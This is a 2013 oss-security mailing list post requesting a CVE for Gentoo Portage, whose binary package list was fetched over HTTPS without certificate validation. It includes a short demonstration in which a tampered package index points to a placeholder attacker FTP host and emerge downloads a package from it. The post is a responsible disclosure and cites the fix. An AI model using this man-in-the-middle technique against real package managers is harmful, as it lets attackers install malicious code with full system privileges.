Date: Wed, 15 May 2013 12:46:57 +0200 From: "Jason A. Donenfeld" <Jason@...c4.com> To: oss-security <oss-security@...ts.openwall.com> Cc: Gentoo Security <security@...too.org>, zx2c4@...too.org Subject: CVE Request: Man in the middle on Gentoo Portage binary package installer Hi Kurt, Portage is the package manager of Gentoo Linux. It supports many features, one of which is the ability to synchronize against a remote list of binary packages, and use that list to determine where to fetch such binary packages. One of the fields in this list of packages is URI: victim # curl -s -k https://portage-build.zx2c4.com/Packages | grep URI: URI: ftp://horrible.attacker.somewhere.on.the.internet/blah victim # emerge -1 portage-utils Calculating dependencies... done! >>> Emerging binary (1 of 1) app-portage/portage-utils-0.30 from gentoo --2013-05-15 12:33:32-- ftp://horrible.attacker.somewhere.on.the.internet/blah/app-portage/portage-utils-0.30.tbz2 => ‘/usr/portage/packages/app-portage/portage-utils-0.30.tbz2’ Resolving horrible.attacker.somewhere.on.the.internet... Over insecure connections, Portage provides the ability to use HTTPS (in addition to SFTP and SSH), so that this remote list of binary packages is not tampered with. This list of binary packages will be downloaded in the background silently. Unfortunately, Portage does not validate the SSL certificates, leaving this open to a trivial man in the middle attack. An attacker could leverage this man in the middle vector to remotely gain complete control over a victim's machine, since Portage runs with essentially full permissions. I reported this to the maintainer of Portage in Gentoo Bug #469888 , and it was fixed in commit b5969af9f5 . Do note that while this commit solves the immediate problem with fetching /Packages, as detailed above, there may be other additional unconfirmed insecure uses of the vulnerable urlopen() function that have not yet been analyzed or fixed. Thanks, Jason  https://bugs.gentoo.org/show_bug.cgi?id=469888  http://git.overlays.gentoo.org/gitweb/?p=proj/portage.git;a=commit;h=b5969af9f575e4e4b669f44e76ad01f0dbc2dd27
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.